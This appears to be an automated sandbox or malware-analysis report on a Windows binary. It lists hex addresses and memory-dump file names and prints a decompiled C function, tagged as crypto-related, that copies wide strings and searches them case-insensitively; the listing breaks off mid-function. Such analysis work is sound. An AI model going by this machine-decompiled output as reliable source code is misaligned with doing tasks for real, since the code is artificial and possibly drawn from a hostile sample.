0x00000000
0x6ea0d3ce
0x6ea0d3ce
0x6ea0d3d0
0x6ea0d3d0
0x6ea0d3d4
0x6ea0d3d6
0x00000000
0x00000000
0x6ea0d3d8
0x6ea0d3d9
0x6ea0d3db
0x00000000
0x00000000
0x00000000
0x6ea0d3db
0x00000000
0x6ea0d3d0
0x6ea0d231
0x6ea0d239
0x6ea0d23b
0x6ea0d23c
0x6ea0d23e
0x6ea0d240
0x6ea0d244
0x6ea0d246
0x6ea0d246
0x6ea0d248
0x6ea0d977
0x6ea0d924
0x6ea0d924
0x6ea0d928
0x6ea0d2cb
0x6ea0d2d0
0x6ea0d2d0
0x6ea0d2d3
0x6ea0d2d6
0x6ea0d2d9
0x6ea0d2dd
0x6ea0d368
0x6ea0d36d
0x6ea0d36f
0x6ea0d373
0x6ea0d378
0x6ea0d382
0x6ea0d384
0x6ea0d386
0x00000000
0x00000000
0x6ea0d388
0x6ea0d38b
0x6ea0d38d
0x6ea0d5fd
0x6ea0d5ff
0x00000000
0x00000000
0x6ea0d607
0x6ea0d607
0x6ea0d60a
0x6ea0d626
0x6ea0d62a
0x6ea0d636
0x6ea0d636
0x6ea0d63c
0x6ea0d63c
0x6ea0d641
0x6ea0d645
0x6ea0d649
0x6ea0d64b
0x00000000
0x00000000
0x6ea0d651
0x6ea0d654
0x6ea0d656
0x00000000
0x00000000
0x6ea0d658
0x6ea0d65e
0x6ea0d671
0x6ea0d671
0x6ea0d676
0x6ea0d676
0x6ea0d678
0x6ea0d958
0x6ea0d701
0x6ea0d701
0x6ea0d701
0x6ea0d705
0x6ea0d707
0x6ea0d730
0x6ea0d733
0x6ea0d736
0x6ea0d73a
0x6ea0d7e1
0x6ea0d7e1
0x6ea0d7e3
0x6ea0d7e5
0x6ea0d919
0x6ea0d919
0x6ea0d91d
0x6ea0d91f
0x6ea0d920
0x6ea0d922
0x6ea0d92f
0x6ea0d934
0x6ea0d936
0x00000000
0x6ea0d936
0x00000000
0x6ea0d922
0x6ea0d7eb
0x6ea0d7ee
0x6ea0d7ee
0x6ea0d7f0
0x6ea0d81c
0x6ea0d81c
0x6ea0d81e
0x6ea0d820
0x6ea0d829
0x6ea0d85c
0x6ea0d85c
0x6ea0d860
0x6ea0d862
0x6ea0d865
0x6ea0d866
0x6ea0d868
0x6ea0d252
0x6ea0d254
0x6ea0d254
0x6ea0d257
0x6ea0d277
0x6ea0d27b
0x6ea0d287
0x6ea0d287
0x6ea0d28d
0x6ea0d28d
0x6ea0d292
0x6ea0d296
0x6ea0d29a
0x6ea0d29c
0x00000000
0x00000000
0x6ea0d2a2
0x6ea0d2a5
0x6ea0d2a7
0x00000000
0x00000000
0x6ea0d2a9
0x6ea0d2af
0x6ea0d2c6
0x6ea0d2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0d2b1
0x6ea0d2b1
0x6ea0d2b5
0x6ea0d2b7
0x00000000
0x00000000
0x6ea0d2bd
0x6ea0d2be
0x6ea0d2c4
0x00000000
0x00000000
0x00000000
0x6ea0d2c4
0x6ea0d8c6
0x6ea0d8c6
0x6ea0d8c9
0x6ea0d8d1
0x6ea0d8d1
0x00000000
0x6ea0d8c9
0x6ea0d96b
0x6ea0d970
0x00000000
0x6ea0d970
0x6ea0d259
0x6ea0d25b
0x6ea0d25d
0x00000000
0x00000000
0x6ea0d264
0x6ea0d264
0x6ea0d266
0x6ea0d266
0x6ea0d26a
0x6ea0d26c
0x00000000
0x00000000
0x6ea0d272
0x6ea0d273
0x6ea0d275
0x00000000
0x00000000
0x00000000
0x6ea0d275
0x00000000
0x6ea0d266
0x6ea0d93e
0x6ea0d895
0x6ea0d897
0x6ea0d899
0x00000000
0x6ea0d899
0x6ea0d82b
0x6ea0d82b
0x6ea0d833
0x6ea0d837
0x6ea0d83b
0x6ea0d83f
0x6ea0d83f
0x6ea0d843
0x6ea0d847
0x6ea0d849
0x00000000
0x00000000
0x6ea0d84b
0x6ea0d84b
0x6ea0d84f
0x6ea0d850
0x6ea0d852
0x00000000
0x00000000
0x00000000
0x6ea0d852
0x6ea0d854
0x6ea0d858
0x00000000
0x6ea0d858
0x6ea0d822
0x00000000
0x6ea0d822
0x6ea0d7f2
0x6ea0d7f6
0x6ea0d7f6
0x6ea0d7f8
0x6ea0d7fc
0x6ea0d7fc
0x6ea0d7fd
0x6ea0d804
0x6ea0d807
0x6ea0d809
0x00000000
0x00000000
0x6ea0d80e
0x6ea0d810
0x6ea0d812
0x00000000
0x00000000
0x00000000
0x6ea0d812
0x6ea0d814
0x6ea0d818
0x00000000
0x6ea0d818
0x6ea0d740
0x6ea0d74a
0x6ea0d74d
0x6ea0d74d
0x6ea0d752
0x6ea0d75a
0x6ea0d75a
0x6ea0d75a
0x6ea0d75b
0x6ea0d765
0x6ea0d76f
0x6ea0d773
0x6ea0d774
0x6ea0d778
0x6ea0d77d
0x6ea0d781
0x6ea0d783
0x6ea0d786
0x6ea0d788
0x6ea0d7da
0x6ea0d7dc
0x00000000
0x6ea0d78a
0x6ea0d78a
0x6ea0d78c
0x6ea0d7bd
0x6ea0d7bd
0x6ea0d7bf
0x6ea0d7c0
0x6ea0d7c4
0x6ea0d7c8
0x6ea0d7cd
0x6ea0d7d1
0x6ea0d7d5
0x6ea0d7df
0x6ea0d7df
0x00000000
0x6ea0d7df
0x6ea0d78e
0x6ea0d791
0x6ea0d794
0x6ea0d796
0x00000000
0x00000000
0x6ea0d798
0x6ea0d79c
0x6ea0d79c
0x6ea0d79e
0x6ea0d79e
0x6ea0d79f
0x6ea0d7a4
0x6ea0d7a9
0x6ea0d7ab
0x00000000
0x00000000
0x6ea0d7ad
0x6ea0d7b1
0x6ea0d7b5
0x6ea0d7b7
0x00000000
0x00000000
0x00000000
0x6ea0d7b7
0x6ea0d7b9
0x00000000
0x6ea0d7b9
0x6ea0d788
0x6ea0d709
0x6ea0d70b
0x6ea0d90e
0x6ea0d913
0x6ea0d724
0x6ea0d724
0x00000000
0x6ea0d724
0x00000000
0x6ea0d913
0x6ea0d711
0x6ea0d713
0x6ea0d716
0x6ea0d71b
0x00000000
0x00000000
0x6ea0d71d
0x00000000
0x6ea0d71d
0x6ea0d680
0x6ea0d680
0x6ea0d683
0x6ea0d6ac
0x6ea0d6b0
0x6ea0d6bc
0x6ea0d6c0
0x6ea0d6c0
0x6ea0d6c5
0x6ea0d6c5
0x6ea0d6ca
0x6ea0d6ce
0x6ea0d6d2
0x6ea0d6d4
0x00000000
0x00000000
0x6ea0d6da
0x6ea0d6dd
0x6ea0d6df
0x00000000
0x00000000
0x6ea0d6e1
0x6ea0d6e5
0x6ea0d6ea
0x6ea0d6fc
0x6ea0d6fc
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0d6ec
0x6ea0d6ec
0x6ea0d6f0
0x6ea0d6f2
0x00000000
0x00000000
0x6ea0d6f4
0x6ea0d6f5
0x6ea0d6fa
0x00000000
0x00000000
0x00000000
0x6ea0d6fa
0x00000000
0x6ea0d6ec
0x6ea0d948
0x6ea0d94b
0x6ea0d94d
0x6ea0d951
0x00000000
0x6ea0d951
0x6ea0d685
0x6ea0d687
0x6ea0d68a
0x00000000
0x00000000
0x6ea0d691
0x6ea0d691
0x6ea0d693
0x6ea0d697
0x6ea0d69b
0x6ea0d69d
0x00000000
0x00000000
0x6ea0d6a3
0x6ea0d6a4
0x6ea0d6a6
0x00000000
0x00000000
0x6ea0d6a8
0x00000000
0x6ea0d6a8
0x6ea0d905
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0d660
0x6ea0d660
0x6ea0d664
0x6ea0d666
0x00000000
0x00000000
0x6ea0d668
0x6ea0d669
0x6ea0d66f
0x00000000
0x00000000
0x00000000
0x6ea0d66f
0x00000000
0x6ea0d660
0x6ea0d95f
0x6ea0d964
0x00000000
0x6ea0d964
0x6ea0d60c
0x6ea0d60e
0x6ea0d610
0x00000000
0x00000000
0x6ea0d617
0x6ea0d617
0x6ea0d619
0x6ea0d619
0x6ea0d61d
0x6ea0d61f
0x00000000
0x00000000
0x6ea0d621
0x6ea0d622
0x6ea0d624
0x00000000
0x00000000
0x00000000
0x6ea0d624
0x00000000
0x6ea0d619
0x00000000
0x6ea0d38d
0x6ea0d2ed
0x6ea0d2f0
0x6ea0d2f0
0x6ea0d2f6
0x6ea0d2fe
0x6ea0d2fe
0x6ea0d2fe
0x6ea0d301
0x6ea0d306
0x6ea0d310
0x6ea0d314
0x6ea0d315
0x6ea0d31a
0x6ea0d31d
0x6ea0d31f
0x6ea0d361
0x6ea0d363
0x00000000
0x6ea0d321
0x6ea0d321
0x6ea0d323
0x6ea0d34c
0x6ea0d34c
0x6ea0d34e
0x6ea0d34f
0x6ea0d353
0x6ea0d358
0x6ea0d35c
0x6ea0d366
0x6ea0d366
0x00000000
0x6ea0d366
0x6ea0d325
0x6ea0d328
0x6ea0d32b
0x6ea0d32d
0x00000000
0x00000000
0x6ea0d32f
0x6ea0d32f
0x6ea0d331
0x6ea0d331
0x6ea0d332
0x6ea0d337
0x6ea0d33c
0x6ea0d33e
0x00000000
0x00000000
0x6ea0d340
0x6ea0d344
0x6ea0d348
0x6ea0d34a
0x00000000
0x00000000
0x00000000
0x6ea0d34a
0x00000000
0x6ea0d331
0x6ea0d31f
0x6ea0d24e
0x00000000
0x6ea0d393
0x6ea0d393
0x6ea0d395
0x6ea0d396
0x6ea0d396
0x6ea0d39e
0x00000000
0x6ea0d39e
0x6ea0d0d3
0x6ea0d0d5
0x00000000
0x00000000
0x6ea0d0dd
0x6ea0d0dd
0x6ea0d0e0
0x6ea0d107
0x6ea0d10b
0x6ea0d117
0x6ea0d117
0x6ea0d11d
0x6ea0d121
0x6ea0d123
0x6ea0d123
0x6ea0d128
0x6ea0d12c
0x6ea0d130
0x6ea0d132
0x00000000
0x00000000
0x6ea0d138
0x6ea0d13b
0x6ea0d13d
0x00000000
0x00000000
0x6ea0d13f
0x6ea0d143
0x6ea0d146
0x6ea0d14e
0x6ea0d168
0x6ea0d168
0x6ea0d170
0x6ea0d179
0x6ea0d17c
0x6ea0d17f
0x6ea0d182
0x6ea0d184
0x6ea0d1a8
0x6ea0d1ab
0x6ea0d1ab
0x6ea0d1b1
0x6ea0d1b9
0x6ea0d1b9
0x6ea0d1b9
0x6ea0d1bc
0x6ea0d1c1
0x6ea0d1cb
0x6ea0d1cf
0x6ea0d1d0
0x6ea0d1d4
0x6ea0d1d9
0x6ea0d1dd
0x6ea0d1e2
0x6ea0d1e4
0x6ea0d1e7
0x6ea0d1eb
0x6ea0d1f7
0x6ea0d1f7
0x6ea0d1fa
0x6ea0d1fb
0x6ea0d1fe
0x6ea0d200
0x00000000
0x00000000
0x6ea0d202
0x6ea0d204
0x6ea0d87f
0x6ea0d881
0x6ea0d884
0x6ea0d888
0x6ea0d88c
0x6ea0d88c
0x6ea0d88f
0x00000000
0x00000000
0x00000000
0x6ea0d88f
0x6ea0d20a
0x6ea0d20a
0x6ea0d20c
0x6ea0d8a1
0x6ea0d8a4
0x00000000
0x6ea0d8a4
0x6ea0d1f1
0x6ea0d1f4
0x6ea0d1f4
0x6ea0d1f4
0x6ea0d1f7
0x6ea0d186
0x6ea0d188
0x6ea0d18b
0x00000000
0x00000000
0x6ea0d191
0x00000000
0x6ea0d191
0x6ea0d150
0x6ea0d150
0x6ea0d154
0x6ea0d158
0x6ea0d15a
0x00000000
0x00000000
0x6ea0d160
0x6ea0d161
0x6ea0d166
0x00000000
0x00000000
0x00000000
0x6ea0d166
0x6ea0d8aa
0x00000000
0x6ea0d8aa
0x6ea0d8b3
0x6ea0d8ba
0x6ea0d8bd
0x00000000
0x6ea0d8bd
0x6ea0d0e2
0x6ea0d0e4
0x6ea0d0e8
0x6ea0d0ea
0x00000000
0x00000000
0x6ea0d0f1
0x6ea0d0f1
0x6ea0d0f3
0x6ea0d0f7
0x6ea0d0f9
0x00000000
0x00000000
0x6ea0d0ff
0x6ea0d100
0x6ea0d102
0x00000000
0x00000000
0x00000000
0x6ea0d104
0x6ea0d873
0x6ea0d877
0x00000000
0x6ea0d877
0x6ea0d05a
0x6ea0d061
0x6ea0d063
0x6ea0d06b
0x6ea0d06d
0x6ea0d070
0x6ea0d074
0x6ea0d0ae
0x6ea0d0b0
0x6ea0d0b3
0x6ea0d0b3
0x6ea0d0b5
0x00000000
0x6ea0d0b5
0x6ea0d078
0x6ea0d0a1
0x6ea0d0a1
0x6ea0d0a3
0x6ea0d0a4
0x6ea0d0a9
0x00000000
0x6ea0d0a9
0x6ea0d07a
0x6ea0d07d
0x6ea0d082
0x00000000
0x00000000
0x6ea0d084
0x6ea0d086
0x6ea0d086
0x6ea0d087
0x6ea0d08c
0x6ea0d093
0x00000000
0x00000000
0x6ea0d095
0x6ea0d099
0x6ea0d09f
0x00000000
0x00000000
0x00000000
0x6ea0d09f
0x00000000

Strings

@, xrefs: 6EA0D90E

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: d5b484cb4b01676e45d293b02262b6479abff9adf7fc0cbe407fb98fb1cd7c94
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 0B422C73A147128BD7148FADD49022A73E2AFD535CF29862CD8A597394EB31DCC1CB89

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EA0AE80(intOrPtr* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __esi;
				signed short* _t229;
				unsigned int _t237;
				signed int _t238;
				signed short** _t243;
				signed short* _t244;
				signed short* _t248;
				signed int* _t250;
				signed int _t255;
				signed int _t259;
				signed int _t264;
				signed int _t268;
				signed int _t271;
				unsigned int _t277;
				signed int _t278;
				void* _t284;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed short* _t298;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed short* _t334;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr* _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t407;
				signed int _t408;
				signed short* _t411;
				signed int* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t452;
				signed int _t455;
				intOrPtr* _t458;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				unsigned int _t465;
				unsigned int _t466;
				signed int _t467;
				unsigned int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				void* _t481;

				_v64 = 0;
				_t458 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t441 = E6EA01030();
				_t481 = (_t478 & 0xfffffff0) - 0x34 + 4;
				_t229 = _v64;
				if(_t229 == 0) {
					__eflags = 0;
					 *_t441 = 0;
				} else {
					if(_t441 != 0) {
						_t384 =  *_t229 & 0x0000ffff;
						 *_t441 = _t384;
						if(_t384 != 0) {
							while(1) {
								_t384 = 1;
								_t382 = _t229[1] & 0x0000ffff;
								 *(_t441 + 2) = _t382;
								if(_t382 == 0) {
									goto L6;
								}
								_t383 = _t229[2] & 0x0000ffff;
								 *(_t441 + 4) = _t383;
								if(_t383 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(2);
					_push(_t229);
					E6EA010B0();
					_t481 = _t481 + 8;
				}
				_v60 = 0x40;
				_v64 = _t441;
				if((_a8 & 0x0000ffff) != 0) {
					__eflags = _t441;
					if(_t441 == 0) {
						_t349 = 0x40;
						_t316 = 0;
					} else {
						_t309 = _t441 & 0x0000000f;
						__eflags = _t309;
						if(_t309 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t346 =  ~( ~_t309 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t346;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t384;
								if(_t384 != 0) {
									break;
								}
								_t309 = _t309 + 8;
								__eflags = _t309 - _t346;
								if(_t309 < _t346) {
									continue;
								} else {
									__eflags = _t346 - 0x7fffffff;
									if(_t346 >= 0x7fffffff) {
										goto L22;
									} else {
										goto L20;
									}
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t316 = (_t346 >> 1) + _t309;
							goto L126;
						} else {
							_t346 = 0;
							__eflags = _t309 & 0x00000001;
							if((_t309 & 0x00000001) != 0) {
								while(1) {
									L20:
									__eflags =  *(_t441 + _t346 * 2) & 0x0000ffff;
									if(( *(_t441 + _t346 * 2) & 0x0000ffff) == 0) {
										goto L126;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - 0x7fffffff;
									if(_t346 < 0x7fffffff) {
										continue;
									} else {
										L22:
										_t349 = 0x40;
										_t316 = 0x7fffffff;
									}
									goto L23;
								}
								goto L126;
							} else {
								_t309 =  ~_t309 + 0x10 >> 1;
								__eflags = _t309;
								while(1) {
									_t384 =  *(_t441 + _t346 * 2) & 0x0000ffff;
									__eflags = _t384;
									if(_t384 == 0) {
										break;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - _t309;
									if(_t346 < _t309) {
										continue;
									} else {
										goto L16;
									}
									goto L23;
								}
								L126:
								__eflags = _t316 - 0xfffffffe;
								if(_t316 != 0xfffffffe) {
									_t349 = 0x40;
								} else {
									 *_t441 = 0;
									_t349 = _v60;
								}
							}
						}
					}
					L23:
					_t24 = _t316 + 2; // 0x2
					_t385 = _t24;
					__eflags = _t385 - 0x40;
					_t386 =  <=  ? 0x40 : _t385;
					__eflags = _t349 - _t386;
					if(_t349 < _t386) {
						_t237 = (_t386 >> 5 >> 0x1a) + _t386 >> 6;
						_t387 = _t386 & 0x8000003f;
						__eflags = _t387;
						if(_t387 < 0) {
							_t387 = (_t387 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t387;
						}
						__eflags = _t387;
						_t238 = _t237 + (0 | _t387 > 0x00000000);
						_push(_t238 << 7);
						_t443 = _t238 << 6;
						_t390 = E6EA01030();
						_t481 = _t481 + 4;
						_t350 = _v64;
						__eflags = _t350;
						if(_t350 == 0) {
							__eflags = 0;
							 *_t390 = 0;
						} else {
							__eflags = _t390;
							if(_t390 != 0) {
								_t306 =  *_t350 & 0x0000ffff;
								 *_t390 = _t306;
								__eflags = _t306;
								if(_t306 != 0) {
									_v68 = _t458;
									_t307 = 0;
									__eflags = 0;
									while(1) {
										_t307 = _t307 + 1;
										_t476 =  *(_t350 + _t307 * 4 - 2) & 0x0000ffff;
										 *(_t390 + _t307 * 4 - 2) = _t476;
										__eflags = _t476;
										if(_t476 == 0) {
											break;
										}
										_t477 =  *(_t350 + _t307 * 4) & 0x0000ffff;
										 *(_t390 + _t307 * 4) = _t477;
										__eflags = _t477;
										if(_t477 != 0) {
											continue;
										}
										break;
									}
									_t458 = _v68;
								}
							}
							_push(2);
							_push(_t350);
							_v68 = _t390;
							E6EA010B0();
							_t390 = _v68;
							_t481 = _t481 + 8;
						}
						_v60 = _t443;
						_v64 = _t390;
					} else {
						_t390 = _v64;
					}
					 *((short*)(_t390 + _t316 * 2)) = _a8 & 0x0000ffff;
					__eflags = 0;
					_t243 =  &_v64;
					 *((short*)(_v64 + 2 + _t316 * 2)) = 0;
				} else {
					_t243 =  &_v64;
				}
				_t244 =  *_t243;
				_v28 = _t244;
				if(_t244 == 0) {
					L40:
					_t392 = _a4;
					_push(0x80);
					 *_t392 = 0;
					 *((intOrPtr*)(_t392 + 4)) = 0;
					_t317 = E6EA01030();
					_t481 = _t481 + 4;
					_t248 =  *_a4;
					if(_t248 == 0) {
						 *_t317 = 0;
					} else {
						if(_t317 != 0) {
							_t393 =  *_t248 & 0x0000ffff;
							 *_t317 = _t393;
							if(_t393 != 0) {
								_t394 = 0;
								while(1) {
									_t394 = _t394 + 1;
									_t352 =  *(_t248 + _t394 * 4 - 2) & 0x0000ffff;
									 *(_t317 + _t394 * 4 - 2) = _t352;
									if(_t352 == 0) {
										goto L46;
									}
									_t353 =  *(_t248 + _t394 * 4) & 0x0000ffff;
									 *(_t317 + _t394 * 4) = _t353;
									if(_t353 != 0) {
										continue;
									}
									goto L46;
								}
							}
						}
						L46:
						_push(2);
						_push(_t248);
						E6EA010B0();
						_t481 = _t481 + 8;
					}
					goto L124;
				} else {
					_t319 =  *_t244 & 0x0000ffff;
					if(_t319 != 0) {
						_t460 =  *_t458;
						_t255 = E6EA0FB60(_t460, _t244, _t460);
						__eflags = _t255;
						if(_t255 == 0) {
							_t396 = _a4;
							_push(0x80);
							 *_t396 = 0;
							 *((intOrPtr*)(_t396 + 4)) = 0;
							_t317 = E6EA01030();
							_t481 = _t481 + 4;
							_t259 =  *_a4;
							__eflags = _t259;
							if(_t259 == 0) {
								 *_t317 = 0;
							} else {
								__eflags = _t317;
								if(_t317 != 0) {
									_t397 =  *_t259 & 0x0000ffff;
									 *_t317 = _t397;
									__eflags = _t397;
									if(_t397 != 0) {
										_t398 = 0;
										__eflags = 0;
										while(1) {
											_t398 = _t398 + 1;
											_t355 =  *(_t259 + _t398 * 4 - 2) & 0x0000ffff;
											 *(_t317 + _t398 * 4 - 2) = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												goto L176;
											}
											_t356 =  *(_t259 + _t398 * 4) & 0x0000ffff;
											 *(_t317 + _t398 * 4) = _t356;
											__eflags = _t356;
											if(_t356 != 0) {
												continue;
											}
											goto L176;
										}
									}
								}
								L176:
								_push(2);
								_push(_t259);
								E6EA010B0();
								_t481 = _t481 + 8;
							}
							goto L124;
						} else {
							_t66 = _t319 - 0x41; // 0x7fffffbe
							__eflags = _t66 - 0x19;
							_t67 = _t319 + 0x20; // 0x8000001f
							_v40 = _t460;
							_t320 =  <=  ? _t67 : _t319;
							_t400 = _v28 & 0x0000000f;
							_t358 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							asm("pxor xmm0, xmm0");
							_v36 =  ~_t400 + 0x10 >> 1;
							_v32 = _t400 & 0x00000001;
							_t448 = 0;
							__eflags = 0;
							_v44 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							while(1) {
								L50:
								_t325 = _t255;
								_t462 = _t255 + 2;
								__eflags = _t462;
								if(_t462 == 0) {
									break;
								}
								__eflags =  *(_t255 + 2) & 0x0000ffff;
								if(( *(_t255 + 2) & 0x0000ffff) == 0) {
									break;
								} else {
									_v52 = _t400;
									_t368 = _t448;
									_v68 = _t325;
									while(1) {
										_t368 = _t368 + 1;
										_t334 = _t255 + _t368 * 2;
										_t429 =  *_t334 & 0x0000ffff;
										__eflags = ( *(_t462 + _t368 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
										_v48 = _t334;
										_t448 = _v44;
										_t430 =  <=  ? _t429 + 0x20 : _t429;
										__eflags = ( <=  ? _t429 + 0x20 : _t429) - _t448;
										if(( <=  ? _t429 + 0x20 : _t429) == _t448) {
											break;
										}
										__eflags =  *(_t462 + _t368 * 2) & 0x0000ffff;
										if(( *(_t462 + _t368 * 2) & 0x0000ffff) != 0) {
											continue;
										} else {
											L55:
											_t325 = _v68;
											_t463 = _v40;
										}
										goto L56;
									}
									_t400 = _v52;
									_t301 = _v48;
									_t452 = _v36;
									_t465 = _v32;
									while(1) {
										_t336 = _t400;
										__eflags = _t400;
										if(_t400 == 0) {
											goto L141;
										}
										L136:
										_t377 = 0;
										__eflags = _t465;
										if(_t465 != 0) {
											L145:
											_v32 = _t465;
											_t474 = _v28;
											while(1) {
												__eflags =  *(_t474 + _t377 * 2) & 0x0000ffff;
												if(( *(_t474 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - 0x7fffffff;
												if(_t377 < 0x7fffffff) {
													continue;
												} else {
													_t466 = _v32;
													goto L149;
												}
												goto L180;
											}
											_t466 = _v32;
											goto L159;
										} else {
											_v32 = _t465;
											_t336 = _t452;
											_v24 = _t301;
											_t475 = _v28;
											while(1) {
												__eflags =  *(_t475 + _t377 * 2) & 0x0000ffff;
												if(( *(_t475 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - _t452;
												if(_t377 < _t452) {
													continue;
												} else {
													_t301 = _v24;
													_t465 = _v32;
													goto L141;
												}
												goto L180;
											}
											_t301 = _v24;
											_t466 = _v32;
											L159:
											__eflags = _t377;
											if(__eflags == 0) {
												L149:
												_t377 = 0x7fffffff;
												goto L150;
											} else {
												if(__eflags > 0) {
													L150:
													_v56 = _t377;
													_t337 = 0;
													__eflags = 0;
													_v52 = _t400;
													_v36 = _t452;
													_v32 = _t466;
													while(1) {
														_t467 =  *(_t301 + _t337 * 2) & 0x0000ffff;
														_t455 =  *(_v28 + _t337 * 2) & 0x0000ffff;
														__eflags = _t467 - 0x61 - 0x19;
														_t468 =  <=  ? _t467 - 0x20 : _t467;
														_t432 = ( <=  ? _t467 - 0x20 : _t467) & 0x0000ffff;
														__eflags = _t455 - 0x61 - 0x19;
														_t456 =  <=  ? _t455 - 0x20 : _t455;
														__eflags = _t432 - ( <=  ? _t455 - 0x20 : _t455);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t432;
														if(_t432 == 0) {
															L155:
															_t400 = _v52;
															_t448 = 0;
															__eflags = 0;
															_t325 = _v68;
															goto L156;
														} else {
															_t337 = _t337 + 1;
															__eflags = _t337 - _v56;
															if(_t337 < _v56) {
																continue;
															} else {
																goto L155;
															}
														}
														goto L180;
													}
													_t433 = _v52;
													_t448 = _v36;
													_t470 = _v32;
													_t339 = _t301 + 2;
													__eflags = _t339;
													if(_t339 == 0) {
														goto L55;
													} else {
														__eflags =  *(_t301 + 2) & 0x0000ffff;
														if(( *(_t301 + 2) & 0x0000ffff) == 0) {
															goto L55;
														} else {
															_v52 = _t433;
															_t381 = 0;
															__eflags = 0;
															_v24 = _t301;
															_v36 = _t448;
															_v32 = _t470;
															while(1) {
																_t381 = _t381 + 1;
																_t301 = _v24 + _t381 * 2;
																_t434 =  *_t301 & 0x0000ffff;
																__eflags = ( *(_t339 + _t381 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																_t448 = _t434 + 0x20;
																_t435 =  <=  ? _t448 : _t434;
																__eflags = ( <=  ? _t448 : _t434) - _v44;
																if(( <=  ? _t448 : _t434) == _v44) {
																	break;
																}
																__eflags =  *(_t339 + _t381 * 2) & 0x0000ffff;
																if(( *(_t339 + _t381 * 2) & 0x0000ffff) != 0) {
																	continue;
																} else {
																	goto L55;
																}
																goto L180;
															}
															_t400 = _v52;
															_t452 = _v36;
															_t465 = _v32;
															_t336 = _t400;
															__eflags = _t400;
															if(_t400 == 0) {
																goto L141;
															}
														}
													}
												} else {
													_v36 = _t452;
													_t448 = 0;
													_v32 = _t466;
													_t325 = _v68;
													L156:
													__eflags = _t301;
													if(_t301 != 0) {
														goto L50;
													} else {
														goto L157;
													}
												}
											}
										}
										L180:
										L141:
										_v36 = _t452;
										_t374 =  ~( ~_t336 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t374;
										_v32 = _t465;
										while(1) {
											asm("movdqu xmm1, [edi+ebx*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb esi, xmm1");
											__eflags = _t465;
											if(_t465 != 0) {
												break;
											}
											_t336 = _t336 + 8;
											__eflags = _t336 - _t374;
											if(_t336 < _t374) {
												continue;
											} else {
												_t452 = _v36;
												_t466 = _v32;
												__eflags = _t374 - 0x7fffffff;
												if(_t374 >= 0x7fffffff) {
													goto L149;
												} else {
													goto L145;
												}
											}
											goto L180;
										}
										asm("bsf ecx, ecx");
										_t452 = _v36;
										_t377 = (_t465 >> 1) + _t336;
										_t466 = _v32;
										goto L159;
									}
								}
								L56:
								_t326 = _t325 - _t463;
								__eflags = _t326;
								_t327 = _t326 >> 1;
								if(_t326 != 0) {
									__eflags = _t463;
									if(_t463 == 0) {
										_t401 = 0;
									} else {
